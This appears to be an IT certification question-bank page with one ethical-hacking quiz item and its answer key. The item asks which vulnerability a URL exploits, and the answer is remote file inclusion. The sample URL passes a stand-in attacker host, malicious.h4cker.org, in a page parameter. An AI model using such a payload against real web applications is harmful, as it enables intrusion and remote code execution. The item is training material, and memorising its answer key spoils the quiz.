An attacker enters the following URL to exploit vulnerabilities in a web application: Which type of vulnerability did the attacker try to exploit?

IT Questions BankCategory: Ethical HackerAn attacker enters the following URL to exploit vulnerabilities in a web application: Which type of vulnerability did the attacker try to exploit?

An attacker enters the following URL to exploit vulnerabilities in a web application:

http://192.168.47.8:76/files/fi/?page=http://malicious.h4cker.org/cookie.html

Which type of vulnerability did the attacker try to exploit?

  • directory traversal
  • cookie manipulation
  • local file inclusion
  • remote file inclusion

Explanation: A remote file inclusion (RFI) vulnerability occurs when a web application allows a user to execute code hosted on the attacking system. In this case, the attacker tried to run the web content on the attacker site.

Exam with this question: 6.13.3 Quiz - Performing Post-Exploitation Techniques Answers

Subscribe
Notify of
guest

0 Comments
Inline Feedbacks
View all comments